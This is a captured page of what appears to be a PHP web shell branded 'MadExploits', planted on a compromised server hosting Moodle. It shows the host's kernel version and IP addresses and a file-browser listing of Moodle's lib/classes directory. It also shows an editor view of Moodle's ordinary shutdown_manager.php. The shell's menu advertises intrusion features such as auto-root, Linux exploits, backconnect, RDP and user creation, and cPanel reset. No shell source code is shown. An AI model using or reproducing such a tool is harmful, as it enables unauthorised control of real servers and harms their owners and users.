Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.165
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
lib /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
access
[ DIR ]
drwxr-xr-x
analytics
[ DIR ]
drwxr-xr-x
antivirus
[ DIR ]
drwxr-xr-x
check
[ DIR ]
drwxr-xr-x
content
[ DIR ]
drwxr-xr-x
dataformat
[ DIR ]
drwxr-xr-x
dml
[ DIR ]
drwxr-xr-x
event
[ DIR ]
drwxr-xr-x
external
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
form
[ DIR ]
drwxr-xr-x
hub
[ DIR ]
drwxr-xr-x
local
[ DIR ]
drwxr-xr-x
lock
[ DIR ]
drwxr-xr-x
log
[ DIR ]
drwxr-xr-x
message
[ DIR ]
drwxr-xr-x
oauth2
[ DIR ]
drwxr-xr-x
output
[ DIR ]
drwxr-xr-x
plugininfo
[ DIR ]
drwxr-xr-x
privacy
[ DIR ]
drwxr-xr-x
progress
[ DIR ]
drwxr-xr-x
session
[ DIR ]
drwxr-xr-x
task
[ DIR ]
drwxr-xr-x
update
[ DIR ]
drwxr-xr-x
upgrade
[ DIR ]
drwxr-xr-x
activity_dates.php
3.02
KB
-rw-r--r--
chart_axis.php
4.25
KB
-rw-r--r--
chart_bar.php
2.69
KB
-rw-r--r--
chart_base.php
8.35
KB
-rw-r--r--
chart_line.php
1.86
KB
-rw-r--r--
chart_pie.php
1.9
KB
-rw-r--r--
chart_series.php
6.52
KB
-rw-r--r--
collator.php
14.34
KB
-rw-r--r--
component.php
46.12
KB
-rw-rw-r--
content.php
6.68
KB
-rw-rw-r--
cssparser.php
1.38
KB
-rw-r--r--
dataformat.php
5.72
KB
-rw-r--r--
date.php
27.97
KB
-rw-r--r--
encryption.php
12.01
KB
-rw-r--r--
filetypes.php
41.07
KB
-rw-rw-r--
geopattern.php
1.26
KB
-rw-r--r--
grades_external.php
34.2
KB
-rw-rw-r--
grading_external.php
24.15
KB
-rw-r--r--
invalid_persistent_exception.p...
1.56
KB
-rw-r--r--
ip_utils.php
11.41
KB
-rw-r--r--
minify.php
3.65
KB
-rw-r--r--
notification.php
7.46
KB
-rw-r--r--
persistent.php
31.71
KB
-rw-rw-r--
php_time_limit.php
3.8
KB
-rw-r--r--
plugin_manager.php
85.43
KB
-rw-rw-r--
qrcode.php
1.39
KB
-rw-r--r--
report_helper.php
2.8
KB
-rw-rw-r--
requirejs.php
5.13
KB
-rw-r--r--
rtlcss.php
2
KB
-rw-r--r--
scss.php
6.42
KB
-rw-rw-r--
shutdown_manager.php
8.77
KB
-rw-r--r--
string_manager.php
5.18
KB
-rw-r--r--
string_manager_install.php
9.05
KB
-rw-r--r--
string_manager_standard.php
29.48
KB
-rw-rw-r--
text.php
27.39
KB
-rw-rw-r--
user.php
47.85
KB
-rw-rw-r--
useragent.php
44.48
KB
-rw-r--r--
userfeedback.php
5.85
KB
-rw-r--r--
uuid.php
5.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : shutdown_manager.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Shutdown management class. * * @package core * @copyright 2013 Petr Skoda {@link http://skodak.org} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); /** * Shutdown management class. * * @package core * @copyright 2013 Petr Skoda {@link http://skodak.org} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class core_shutdown_manager { /** @var array list of custom callbacks */ protected static $callbacks = []; /** @var array list of custom signal callbacks */ protected static $signalcallbacks = []; /** @var bool is this manager already registered? */ protected static $registered = false; /** * Register self as main shutdown handler. * * @private to be called from lib/setup.php only! */ public static function initialize() { if (self::$registered) { debugging('Shutdown manager is already initialised!'); } self::$registered = true; register_shutdown_function(array('core_shutdown_manager', 'shutdown_handler')); // Signal handlers should only be used when dealing with a CLI script. // In the case of PHP called in a web server the server is the owning process and should handle the signal chain // properly itself. // The 'pcntl' extension is optional and not available on Windows. if (CLI_SCRIPT && extension_loaded('pcntl') && function_exists('pcntl_async_signals')) { // We capture and handle SIGINT (Ctrl+C) and SIGTERM (termination requested). pcntl_async_signals(true); pcntl_signal(SIGINT, ['core_shutdown_manager', 'signal_handler']); pcntl_signal(SIGTERM, ['core_shutdown_manager', 'signal_handler']); } } /** * Signal handler for SIGINT, and SIGTERM. * * @param int $signo The signal being handled */ public static function signal_handler(int $signo) { // Note: There is no need to manually call the shutdown handler. // The fact that we are calling exit() in this script means that the standard shutdown handling is performed // anyway. switch ($signo) { case SIGTERM: // Replicate native behaviour. echo "Terminated: {$signo}\n"; // The standard exit code for SIGTERM is 143. $exitcode = 143; break; case SIGINT: // Replicate native behaviour. echo "\n"; // The standard exit code for SIGINT (Ctrl+C) is 130. $exitcode = 130; break; default: // The signal handler was called with a signal it was not expecting. // We should exit and complain. echo "Warning: \core_shutdown_manager::signal_handler() was called with an unexpected signal ({$signo}).\n"; $exitcode = 1; } // Normally we should exit unless a callback tells us to wait. $shouldexit = true; foreach (self::$signalcallbacks as $data) { list($callback, $params) = $data; try { array_unshift($params, $signo); $shouldexit = call_user_func_array($callback, $params) && $shouldexit; } catch (Throwable $e) { // phpcs:ignore error_log('Exception ignored in signal function ' . get_callable_name($callback) . ': ' . $e->getMessage()); } } if ($shouldexit) { exit ($exitcode); } } /** * Register custom signal handler function. * * If a handler returns false the signal will be ignored. * * @param callable $callback * @param array $params * @return void */ public static function register_signal_handler($callback, array $params = null): void { if (!is_callable($callback)) { error_log('Invalid custom signal function detected ' . var_export($callback, true)); // phpcs:ignore } self::$signalcallbacks[] = [$callback, $params ?? []]; } /** * Register custom shutdown function. * * @param callable $callback * @param array $params * @return void */ public static function register_function($callback, array $params = null): void { if (!is_callable($callback)) { error_log('Invalid custom shutdown function detected '.var_export($callback, true)); // phpcs:ignore } self::$callbacks[] = [$callback, $params ? array_values($params) : []]; } /** * @private - do NOT call directly. */ public static function shutdown_handler() { global $DB; // Custom stuff first. foreach (self::$callbacks as $data) { list($callback, $params) = $data; try { call_user_func_array($callback, $params); } catch (Throwable $e) { // phpcs:ignore error_log('Exception ignored in shutdown function '.get_callable_name($callback).': '.$e->getMessage()); } } // Handle DB transactions, session need to be written afterwards // in order to maintain consistency in all session handlers. if ($DB->is_transaction_started()) { if (!defined('PHPUNIT_TEST') or !PHPUNIT_TEST) { // This should not happen, it usually indicates wrong catching of exceptions, // because all transactions should be finished manually or in default exception handler. $backtrace = $DB->get_transaction_start_backtrace(); error_log('Potential coding error - active database transaction detected during request shutdown:'."\n".format_backtrace($backtrace, true)); } $DB->force_transaction_rollback(); } // Close sessions - do it here to make it consistent for all session handlers. \core\session\manager::write_close(); // Other cleanup. self::request_shutdown(); // Stop profiling. if (function_exists('profiling_is_running')) { if (profiling_is_running()) { profiling_stop(); } } // NOTE: do not dispose $DB and MUC here, they might be used from legacy shutdown functions. } /** * Standard shutdown sequence. */ protected static function request_shutdown() { global $CFG; // Help apache server if possible. $apachereleasemem = false; if (function_exists('apache_child_terminate') && function_exists('memory_get_usage') && ini_get_bool('child_terminate')) { $limit = (empty($CFG->apachemaxmem) ? 64*1024*1024 : $CFG->apachemaxmem); // 64MB default. if (memory_get_usage() > get_real_size($limit)) { $apachereleasemem = $limit; @apache_child_terminate(); } } // Deal with perf logging. if (defined('MDL_PERF') || (!empty($CFG->perfdebug) and $CFG->perfdebug > 7)) { if ($apachereleasemem) { error_log('Mem usage over '.$apachereleasemem.': marking Apache child for reaping.'); } if (defined('MDL_PERFTOLOG')) { $perf = get_performance_info(); error_log("PERF: " . $perf['txt']); } if (defined('MDL_PERFINC')) { $inc = get_included_files(); $ts = 0; foreach ($inc as $f) { if (preg_match(':^/:', $f)) { $fs = filesize($f); $ts += $fs; $hfs = display_size($fs); error_log(substr($f, strlen($CFG->dirroot)) . " size: $fs ($hfs)", null, null, 0); } else { error_log($f , null, null, 0); } } if ($ts > 0 ) { $hts = display_size($ts); error_log("Total size of files included: $ts ($hts)"); } } } } }
Close